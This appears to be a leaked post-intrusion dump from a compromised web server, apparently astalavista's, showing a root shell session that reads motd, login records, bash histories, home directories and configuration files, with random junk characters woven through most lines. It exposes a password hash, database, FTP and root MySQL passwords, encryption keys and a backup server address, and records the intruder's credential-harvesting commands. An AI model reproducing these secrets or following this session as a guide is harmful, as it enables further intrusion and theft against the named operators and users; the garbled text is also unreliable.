astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::: z$ Z7 @# k; I3 h
! V0 i0 v' b; W) g
sh-3.2# cat /etc/motd4 m h0 A$ U7 g) Z. N2 M. ]
#####################################################7 O* g4 u$ y% B# b; y" l% H
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #4 s7 r& ~" R# ~+ o1 i# ?* `2 ` `
# |__| [__ | |__| | |__| | | | [__ | |__| #
. z, q/ t9 M- j/ {: c% `# | | ___] | | | |___ | | \/ | ___] | | | #
3 @9 Y8 Y8 R) V" V# #1 k: ?# G2 h+ S* y" D; n; [
#####################################################
6 I# V6 L6 f/ O( B: }$ B5 C- y# #; H7 v8 @# e( V
# Admin Contact - 链接标记support@secureservertech.com #* C4 a: o& ]; a2 w
# #
* _8 \6 v, N8 H! y0 ?) }( b# Available ShortCuts #" y$ Q5 T5 ]9 h; I
# #) T! C# F5 G! U+ O
# nst - list active connections #9 Y$ o, `( Y8 @- {) C) c
# ddos - shows how many times each ip is connected #
! m( k2 \; w6 W9 J) J9 u* \& }5 z# ltr - restart the webserver #; Q0 O5 l4 z$ \- V5 `" {8 Q) f; I$ n
# phpc - edit the php config file #) s% T, S I. K" ]) @# Y
# htc - edit the webserver configuration file #: O }4 y/ x% H0 k$ M: k
# up - uptime #
) ] `( V5 i: q/ h8 a$ u; z# etd - edit the motd of the day file #
& G9 v1 G) F2 i6 H# htr - start and restart apache if needed #- k; n1 _& c! l4 d8 [
# syng - shows active SYN_RECV connections #2 {0 E! S) k; f6 v
# synd - syn flood blocker - “synd -h” for usage #
6 d. ?( J5 I0 S###################################################### N! g! P2 I# N/ I
# NOTES: #
1 T0 ~% B9 A) ?, ]5 \# Last Upgrade - 12-08-2008 by JF #
2 Z9 n. e' s5 \. [1 I# My.cnf/Mysql Optimization - 1-28-09 #
3 F E' @5 o+ a" Q/ M# #, \6 v1 M! u5 P& l
# #
3 k" V7 O I. }0 E8 Q+ B k# #
4 J9 C0 G- R( M# p3 I, ]- }1 Z#####################################################/ c8 B4 w7 U2 f# s% Q$ ?% i
! }# p; g& O. M- B: E
sh-3.2# lastlog | grep -v Never/ ?8 I) b7 O5 Q; @
Username Port From Latest; P# m5 a* v4 }; w' e% U
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
, I- I& V- p, I0 _6 [, @admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008- G, r; ~6 @8 C2 @4 s, e
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
3 y: M. T( F9 ~3 x+ h" Y# oastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
2 G& l4 I1 K; Z, _) g
7 r; L0 i) k* Y$ g% |0 z; x% psh-3.2# ls -la
! U1 L' o" [2 Z etotal 453376( I( G9 Q1 h7 I. i1 m K4 j
drwxr-x— 15 root root 4096 Jun 4 08:40 .0 R. `7 T( r' g3 }; {/ X
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
m7 x: A K: [; d* J# X-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
1 e% l( s7 O0 @5 F( |-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
* r1 c, J" n. T/ F# I-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
0 A. L5 C1 {( L; I9 N-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout' \. k* r' e5 a' M' ~
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile3 _7 A+ q- T; `- s0 ~- z- n: N2 l
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc8 ^3 H: X( K4 K9 `
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
, i8 K5 h/ p' ~-rw-r–r– 1 root root 1327 Nov 29 2007 cert
, h J9 K/ i; w% h7 v& W-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql0 y E+ L$ m' R+ H1 T( M% K
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan
f7 ]! i/ u: B& V# _2 Y) |-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc+ O P6 @% T$ [2 x Z# o; Q
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql( F5 |- U0 F+ f- m0 a. L
drwx—— 2 root root 4096 Oct 28 2007 .elinks
+ ?( H2 c4 o0 @: S" M2 idrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.12 u# W/ r3 |* G, u- m; @( d6 l; f
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
, s9 T: l5 {9 p1 _9 D-rw——- 1 root root 0 Apr 16 13:19 .history! @* m' u2 p2 r; t
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
1 c) x! T7 d% U M8 _+ o/ q: u) b y-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
i& I0 C9 |; ?# }' x4 k-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh# `2 A; H) a e% F* N
-rw——- 1 root root 35 Jun 2 14:23 .lesshst/ s; L2 f1 y( a( n
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
& h1 b; Z# e2 ?' j) Rdrwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
) i! y. d! U7 z7 }-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
* f+ I* M7 M, a3 K) D4 p-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2$ z8 _8 _- O1 d* ]; m
-rwx—— 1 root root 760 Sep 18 2008 lp
6 M2 s$ }$ }$ r, u) Udrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
0 m& F: E+ A! b F; J/ W: ?-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
# D( }! D0 {# c; o/ Z5 {. M-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.18 x5 C* P0 A2 Z% h" k8 b
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9: K7 v3 c- A' j$ l5 e
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
5 |5 ?4 F) H, q! p3 ydrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3# U u: j f X
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz: n7 z, m' X& F e1 g4 J
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
; Z2 g, w: K) W) d9 h5 Z-rw——- 1 root root 41 Oct 19 2007 .my.cnf
& ~! ^ w1 F6 p* d5 h3 `/ B-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
/ b' }- W3 I( ^" _2 q-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport, O; i- C A, r' \ X
-rw——- 1 root root 41 May 20 2008 .mytop
$ P- j$ E0 n3 {; s7 L+ `drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
: `% S1 ~# T2 E! Z) E$ v1 w-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
! H& G4 F' n; @* o* Ddrwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp- \2 P& h; }3 H/ e
-rw——- 1 root root 1462 Sep 21 2007 opt.php
% Y* j. N* t7 e* o$ J+ y-rw-r–r– 1 root root 3371 Sep 22 2007 p
( Q" C* W w5 O% d! e* h-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz28 h7 q. Q4 m H! U! Q* \
-rw——- 1 root root 1024 Feb 3 21:32 .rnd) _1 x+ O+ x& z3 t9 [
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
7 V% H& M F0 \-rw-r–r– 1 root root 887 Nov 28 2007 server.key% c- n& W2 R+ X! r& S# r% s
drwx—— 2 root root 4096 Oct 10 2008 .ssh4 q) Z% A7 f, S) l9 o1 G
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
; P4 _+ L i1 M+ F-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc8 o! I% \& d9 P6 N
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip! C; W$ d; K7 Z9 ]$ e6 t
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
/ U6 ]3 U0 _& H4 e7 ~drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp* m! w/ O1 ]+ I5 s: s) |4 Z, H9 y7 \
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh3 S& I7 D& Z& H: S/ H8 y4 z
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
6 q& C0 m+ r: ]8 {% Z/ A-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2% n& k/ u9 n8 e" N9 R2 a
-rw——- 1 root root 12997 May 16 2008 .viminfo& P1 m2 L& O4 M$ u
* K d! ?. B1 Y& N
sh-3.2# cat .bash_history& i/ j# K4 a6 Y" G3 b7 J
[snip]
$ k: k+ E' R6 X2 wwget cp4sst.com/sstlinux.tar.gz
% Q8 X5 C) k( D8 J( y/ I6 n: h! xtar zxvf sstlinux.tar.gz
* M, i) Q& v2 B5 A4 h1 u4 ~cd linux-2.6.27.10
4 u. g, \& a/ x# X, u* z+ e* psh install.sh, w2 E/ X7 f0 @6 o( Q# f; B
make bzImage ; make modules ; make modules_install ; make install% P* n1 O" k3 M) z! Y( H7 H
make clean
+ d% W: V( {% @service mysqld restart
3 _( {' I6 c' N- Y+ q0 S* U[snip]
! b% u8 j) L; o5 scd /usr/sbin/) o4 j; R; |. r' t" c
chmod 4777 traceroute
( j& \* W4 x/ u/ e' k! H$ a+ Q0 G- a' xchmod 4777 ping
, w5 j# E, B( o( u( v# Z- E$ Ztraceroute -I 链接标记[url]www.astalavista.ch[/url]
- @3 B8 {" v. m# p[snip]
1 r4 u" k) O3 ^7 v5 N+ s, Ovi /etc/csf/csf.conf
* `2 @# ]& |& p' utraceroute google.ch j& ~; J: [: E0 R6 c
service csf restart# a5 \8 i. R, H5 u/ X, l6 J! K
tracert google.ch
/ t7 Z4 k, @0 E( Fservice csf restart
r3 x9 B0 g1 Q8 ~8 I; @( straceroute 链接标记[url]www.google.ch[/url]
+ E) z& {) j8 I8 Z: r& |3 ~tracert 链接标记[url]www.google.ch[/url]
* y8 w F9 ?- l5 S* R& v5 Htraceroute 链接标记[url]www.google.ch[/url]* E" b+ T5 W. X
locate traceroute
' A; b9 }# K( {4 E- I; ^chown 4755 /bin/traceroute
7 f: t0 ]7 s$ M$ Zchown 4777 /bin/traceroute: x7 ~ c B# `* C- o; a7 b9 {
locate ping# U- W9 j$ h$ `
chown 4755 /bin/ping+ s9 M' E0 n: o( f7 r
chown 4777 /bin/ping9 Q$ r: o5 o* Q6 I$ Z% Y( \! V$ n9 k
cd /bin/
% Z) P" N( ^$ R {! Nls -ali | grep ping0 z& k4 ]$ `7 Q. o8 i* d6 _) W
chown root ping
8 h2 N @# d& ?4 `* uchmod 4755 ping
) i" m2 r1 j |ls -ali | grep traceroute/ L; i& e- U& W
chown root traceroute
4 M% q. f$ m4 a; _7 G; Rchmod 4755 traceroute
8 t, h0 ]8 A- S5 M1 fls -ali | grep traceroute( I" ~# h @9 D" ^2 O4 v# h. j
traceroute -I 链接标记[url]www.google.ch[/url]: q' q" R# e$ \/ R$ ?
traceroute 链接标记[url]www.google.ch[/url]/ z7 Y. ~; ` J' \
whois pmsantos.ch
5 v W) e1 S j1 F[snip]9 {9 \- n! j; ]7 |# p& e! t9 F( B
mysql -h com_contrexx2_live < /root/defaultp_ports.sql
6 a/ g+ Q# x+ ^! ?! z( Mmysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql, H/ Q* ? }" b# n
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
1 M* h- Y# g. [6 qmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
% @" t" n2 S( S4 X' ^3 rtop) P1 b3 h; C: J& Q
ping ssth.ch( g! y9 p. y/ a& r* }0 a4 F5 \% w
ping asdlkfaljgasd???ljg???lasj.ch
5 p# ^! Q5 y J5 Q. q' Mping asdlkfaljgasdlasj.ch: \( R @5 \4 N# ^
ping 链接标记[url]www.ssth.ch[/url]# M0 z; T I% k+ C
ping ssth.ch
( a; a8 k) m0 B+ x) v- V0 ~& dnslookup 链接标记[url]www.google.ch[/url]! u# P9 p0 f" l, H, n' n# w
nslookup 链接标记[url]www.ssth.ch[/url]
! [, P' ]. C6 ~( tman nslookup7 q. {" y2 R- L& u' O4 Q
ping 链接标记[url]www.google.ch[/url]2 R. `# D; w! r I8 w& x+ Y
nslookup 链接标记[url]www.google.ch[/url]) {( }7 b, x$ J
nslookup 链接标记[url]www.google.ch[/url]' f2 }! |+ X4 |; h9 D
nslookup salfjasdlf.ch+ g( w2 \* C5 n9 D7 V
[snip]
2 Y! Q( U5 ]+ O) l& P9 Vopenssl passwd -1 sadf# n7 \5 S" o) {2 z
openssl passwd -1 5cZNHstdTy
0 y, F8 p- r, Z9 n7 X) z" W' Smysql+ e. d/ }% W! I/ r& H
mysql
5 u( @# J+ N; R- ^2 p" `7 W$ ylocate proftp
. { Z5 M! A b0 [* s+ n7 zvi /etc/proftpd.passwd
- g' k" v5 q5 k2 f3 P: ~$ y7 E& R+ lservice proftpd restart
# O, n N3 t) ^. K: Rlocate proftpd.conf
8 Q, y/ b2 Z) m) jvi /etc/proftpd.conf9 J( P1 M8 h0 s/ b0 g( y8 w
vi /etc/proftpd.passwd
' p! W E; ^$ U* ?- q* Oservice proftpd restart
0 Z$ \% O& j' W# F* M1 @8 m R[snip]* `* H9 K- W2 L1 Y) \
/bin/sh /home/com/backup_system/backup.sh+ g9 r) k; ?8 q8 p. m. U
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin8 \- f) E! X+ V8 x
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
: ^ e8 k; a$ b% Xmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql# j( d% \9 S) z N; i' V
ls -ali1 [/ r2 n, r* i6 w, _
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
3 h& l# t7 O xmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
) b. p& {" T. ~1 G3 k) G4 ecrontab -l d+ M) n1 B+ i {9 H
crontab -l0 u/ j, X' Q( N( Z! m! M
php -q /home/com/public_html/modifications/cronjobs/securitynews.php
+ A& j9 P+ B9 O& J3 T/home/com/public_html/modifications/cronjobs/exploits.sh
3 ~5 p4 \# n% P: Q9 ?0 Vwget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]. z" x. P c2 t9 p
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
; A4 K8 ~& E( | |+ ?cd lsws-4.0.3
9 x k# S2 l; [+ j {sh install.sh
! V. H O; K$ u' `) U' {2 r" [uptime
8 G2 n! g. H$ W( k: Phdparm -tt /dev/sda
7 x1 Z0 K" y6 H2 V! Diostat
7 p, |; \& b0 q; _yum install iostat3 H0 G& E( t P' V
iostat+ W6 K1 Z* y2 U" J
whereis iostat5 I) c/ ?/ ?5 O0 M1 {8 C
yjm clean all, {. F" A# J* ]* E+ Z+ P8 C# Y
yum clean all ; yum -y update1 r5 P4 u& b+ H# u' m8 x1 i8 |+ \
iostat) W8 N9 s( J$ i3 H+ R
yum install systat
. k N" M+ B. H3 o3 x% y6 nrpm -qa | grep iostat
9 a0 r/ j5 L& d# ~3 ~+ erpm -qa | grep sysstat' Y, B" ~- ]: G' y$ u
rpm -qa | grep systat
# e; b N# n: i$ q% W- vdmesg -c
% W& X) m/ o: c8 D; E: x* csysctl -p
- S [9 k' N! i- Luname -r
+ q, Q* I% l9 |# m" f) P5 Scd /usr/src
! h! b; ]$ k, F6 o. A0 gwget nix101.com/kernels/sstlinux.tar.gz
- s6 ?6 ~ Y0 Y4 ?. G; m, k5 cshutdown -r now$ J6 Q# X! U! i
nano -w /boot/grub/grub.conf! F" j. s, w# U# d
6 A. m# t) H8 v5 [9 n+ u3 `sh-3.2# cat .my.cnf& j+ {5 a. f" Y
[client]
. P$ h3 h: i7 Z5 t. j' Quser=da_admin
6 K4 L) M7 W5 ]/ B2 D3 [4 opassword=X9dctmRH- c+ D) H8 t) T; k$ l0 T8 n& c
3 L# j+ X6 q% w7 Y3 v% Lsh-3.2# cat /home/com/backup_system/backup.sh
+ W: O3 }6 e! r! s( H#!/bin/sh% F2 Z6 ^) ^! |4 h# v9 s
#####################################################################
. i8 [# X: c( I) T# ## T3 J& J1 V9 o* o5 o
# incremental backup for astalavista.com #
- u5 \, F2 c- z* Y2 K1 h# #( n; _, Q( ^7 d9 q7 p' T
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #) [+ ~4 C: G7 Q4 k2 u/ {
# #
! y' j2 A1 D; H4 [4 N: n# c( W#####################################################################; v1 ~& D8 T8 O8 d4 I
[snip]/ `8 S% @# }$ A; C1 R: f0 R1 _- t5 n
PROG_DIR=”/home/com/backup_system”;
3 \( y/ U9 D- ^$ J) |BACKUP_DIR=”/home/com/backups”;2 r" y- d4 j; m9 B, W
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
& S8 U7 x. ]. z1 E0 ?) z/ ^5 s- H# ftp for synology backup server6 L6 y& Y& y3 x7 H4 C* v! t
FTP_HOST=”212.254.194.163″;
& m( [9 \! C5 G" Z% V4 `" M4 xFTP_PORT=”21″;+ S1 U7 V. I6 S1 K L' F% ?0 Z
FTP_USER=”astalavista.com”;
1 c6 r G1 J* V, K. _/ o& F |& yFTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
: J! o. Y1 b; c+ ]+ Y& rFTP_DIR=”/astalavista.com”;4 T/ T: g6 V8 |+ f# ?- ^
# database
o1 ]# r7 f: c, u# O* u/ J6 o& bDB_HOST=”localhost”;7 u' P0 H; S7 f% i$ S3 B! \
DB_USER=”contrexxuser2″;- n/ G0 ?$ @) C, G6 H6 p$ L- c
DB_PASS=”0fEYNZgXz1pKe”;, g4 m W2 R& o' l# i* W4 |' O
DB_DATABASE1=”com_contrexx2_live”;, A' Y6 z3 M: j1 c3 V# _
DB_DATABASE2=”com_contrexx2″;
* _* y2 g# G- L" K* e! v( r# n[snip]5 M. ]; e' _- a2 M8 M
ftp -in $FTP_HOST $FTP_PORT <<EOF
( g0 o% E$ ]# r( }1 X. Pquote USER $FTP_USER, w2 z) i' E$ x
quote PASS $FTP_PASS2 A6 z; S9 w; B4 T8 w) B( P! _
cd $FTP_DIR, C, G: o5 I+ r1 {" i/ a
put $DB_FULLNAME-SQL_Dump.tar
6 B& P6 x3 ~9 H; _! R& @put $BACKUP_FULLNAME-Public_HTML.tar' Z" j0 Y9 d% ^6 Q- H0 j
close
3 d9 H2 [* h( X- w; _0 X0 s, ?* Obye! P' J$ G, [8 ^
EOF, N! G E8 M. w' T, ?
+ ^/ [! j% J7 i$ Hsh-3.2# cd /home
* F: y' y3 ~" }& Z7 lsh-3.2# ls -la
: o% i" L% b, |* ?" \3 ntotal 120
7 Q$ M4 P3 w3 T# Y1 v* Edrwxr-xr-x 14 root root 4096 Mar 11 17:56 ." ~% d1 g! N, j4 e5 g
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..) W! k7 z2 y8 c" m
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin2 G. E: W( a! X! v5 Y
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group2 p$ j1 s. T F' e; u4 P! _
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user) M4 ]6 Q7 c$ E0 ^/ L
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
2 n) r+ I+ q& a( P9 c6 R1 [- ?drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
# ]9 c# u& N C2 B0 n. x( Ndrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
8 [: u/ S" o" R# |+ x" Udrwx–x–x 10 com com 4096 Apr 28 12:40 com' @1 y( Z3 p1 d) D% ^ U; t7 D8 c
drwxr-xr-x 2 root root 4096 May 17 2007 ftp/ g- v) `! I+ v- `
drwx—— 3 jon jon 4096 Sep 21 2007 jon
; E R7 \5 Q8 ?2 Ldrwx—— 2 root root 16384 Sep 11 2007 lost+found5 b2 ^1 R0 q; _) g& L7 ]; _" G
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
6 j/ B2 b: w @# z# e0 Fdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
: A" s4 t0 {' e4 J2 A, ?drwx—— 2 jon jon 4096 Sep 15 2007 test' x6 i$ h Y; i1 t; I
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp' ]6 ~& J5 Z. O y4 l1 ?( q X
& D3 I7 w3 `9 I6 u m) Ysh-3.2# cd admin
7 G* {$ [6 i/ L y- }" Ksh-3.2# ls -la
* s3 c& r L3 j7 n7 @7 }" wtotal 17358963 M+ z$ a; e; U& N* V/ t
drwx–x–x 9 admin admin 4096 Nov 28 2007 .
6 `; f- X) Q1 x _drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..- G1 k, R, L |: V$ V9 r5 [' B
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups2 {* J' H) H/ F( ~; O( Q
drwx—— 2 admin admin 4096 Sep 28 2007 backups
+ [8 B0 B6 b$ m# e; D-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
7 h3 t* p% {% x: S: d+ t/ C5 Y-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout Q2 E. u5 Y1 i$ J6 ~
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
0 [" C2 x4 f/ d( P7 {-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc' u% I) g1 q' W
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups2 Z4 Y2 E: v- [. L
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains
+ ^1 s U6 \& {& T: b+ G. vdrwxrwx— 3 admin mail 4096 Sep 21 2007 imap4 m2 P3 a1 K+ T% ? h
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
$ h$ K4 P2 X' [0 ]6 j( w& udrwx—— 2 admin admin 4096 Sep 21 2007 mail |) g* D: O5 z
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
) u3 a: _; c' a& ?" X: | q-rw-r–r– 1 root root 887 Nov 28 2007 server.key
$ z: A+ v% l5 B. B+ ~-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
- P9 a: r( N n; I-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz% T) m4 B& V: g1 m2 g% f
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups$ ]: |6 U& @) G. {
& X+ y3 \; X6 y0 C" C$ Vsh-3.2# ..# Z2 t) z. Q, g4 K$ a) p/ Z2 m
sh-3.2# cd jon
3 |% ~' R* T" ash-3.2# ls -la
; ?8 `! {/ E) j S3 i% ?: Mtotal 369 H- T: h1 V/ n5 ? M p
drwx—— 3 jon jon 4096 Sep 21 2007 .
+ Z0 E& K4 E% t4 X5 P: ldrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..9 C. j& v y6 l; t4 E2 M
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history$ }9 ^- W5 D! |3 W0 Z1 S4 k; H: x
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout0 }2 M- I/ H* H: F! W3 m5 V
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
& M! f; @$ p/ m' M-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
1 l0 p! |7 L; U, p-rw-r–r– 1 root root 24 Sep 21 2007 info.php
8 J: S5 |7 L& k( U" j: r# Adrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
7 C2 _6 k' o: q4 ?' l
/ q1 i" {- K9 i ~9 q# L1 l, ish-3.2# cd ..
+ W L# L; } q) _. j1 Ash-3.2# cd test' X( d- ?8 ?" Q' ~; T6 S6 w5 S2 c
sh-3.2# ls -la% d3 \1 O5 {) A6 D, b
total 48
! ^- c1 I& V: t) r9 edrwx—— 2 jon jon 4096 Sep 15 2007 .
6 V% ?; q! {1 F% k0 L/ p- ?drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
0 \: D4 A3 r6 A, X' k-rw——- 1 jon jon 79 Sep 21 2007 .bash_history, e# ?2 j: J; X& U4 T+ Z
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
* M! R/ R, ]6 z$ v-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile! F8 k' \2 {/ z5 |
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
; Y' n9 D4 l) R1 Tsh-3.2# cat .bash_history
7 @1 Z% R; F: w9 M, [/usr/bin/mysqladmin -u root password PoliuJhytg67
) N1 b: o- z' P) y- p1 B3 x4 K* R" P: h# r j; Z
sh-3.2# cd ..% w5 Y3 @9 Q2 \7 k
sh-3.2# cd astanet& `' P) _, E& K7 |, j
sh-3.2# ls -la
1 E- r! V3 y4 x* itotal 527 g' P; P! r* c. H3 l
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .! i: \$ v5 C; _
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
( d4 t) i4 M7 a: _; cdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth3 _% F7 z) x" \. a) s4 j
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history( W8 Q' n ]) u) z
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
2 T1 y9 d' G. Y5 m( F-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile# N; U' ~0 d+ p8 e! {- Y
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
8 k) l& h5 X. j. C8 t/ D( {drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
& |* R+ ?0 x- W/ V+ Idrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
3 x' T6 r! ^! D3 P# }$ idrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
$ k* d8 h( ~4 A-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history1 o+ N# _6 J) F( m7 s% C _
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
1 |" _/ i1 l5 m! j. \, a-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
. ~0 n! u C* l I# N/ |
' P- ^9 h4 C( K. Q; \: ash-3.2# cd auth/; R4 B( I" q Y# i" H: v- [# \* E
sh-3.2# ls -la; S( C$ j$ q0 p3 r% N. I
total 28
, t! W. K+ q" F) S% ?: S4 Ydrwxr-xr-x 2 root root 4096 Dec 23 16:00 .
& e& a- w1 M$ w& kdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
# B3 B5 o+ Y% S# k-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
4 ^( }, j7 Z4 }) d! ^-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
3 o+ V7 q# F% `-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd* _- M4 ?& m& C& k3 z7 a3 ]
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
4 _' W& K7 `& _6 p# Z- b8 y-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
/ R/ Y- X. w" }/ u
( |; r. T# C$ m! P+ psh-3.2# cat hackercontest.config.inc.php
0 C( @7 \/ I) b1 \<?PHP( @ y/ n! Y+ |+ O0 k6 y
// Variabeln f?r Verbindung zur Datenbank //6 k! E+ i8 Y3 Q1 P! f" N
$conxHost = ‘localhost’; // MySQL hostname) |3 S5 r' T6 w3 n! y% b
$conxUser = ‘hackercontest’; // MySQL user5 g+ ?) S$ L4 y3 @6 {
$conxPassword = ‘K6m@7dUc’; // MySQL password
4 n7 d; U9 J; Q' v$ f- e$ q4 }$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
( d* ?+ @! M# a* x$ j: `?>4 c6 | L* B( }& Z9 F' [
sh-3.2# cat hosting.config.inc.php9 j$ G% b4 K7 ^/ s6 ^/ |, g- W
<?PHP1 r. r" ^& V' Q# y$ w& U2 z1 I
// Variabeln f?r Verbindung zur Datenbank //8 ?& b, d, l! E. ]0 k @
$conxHost = ‘localhost’; // MySQL hostname$ O5 j# H2 `, s: `- ?0 j. @
$conxUser = ‘hostinguser’; // MySQL user& C6 J- o! ~4 v9 |$ m
$conxPassword = ‘cXvB3981′; // MySQL password) k- Q9 I+ V% j9 m
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish* `) B2 ^ ~/ Z2 E3 w
?>- U8 ]9 Z$ R# |& O+ q* y
3 n0 \4 U' D$ q9 g; B( p+ ~$ G5 ]
sh-3.2# cd ..
, h9 s& `5 }! M& s7 csh-3.2# cd com
+ B* o2 G. V: M" o u' ?5 [5 I1 Nsh-3.2# ls -la* W q9 A8 Q- b2 v4 A
total 141208( Y: ^+ D; Y/ J$ g' m6 `
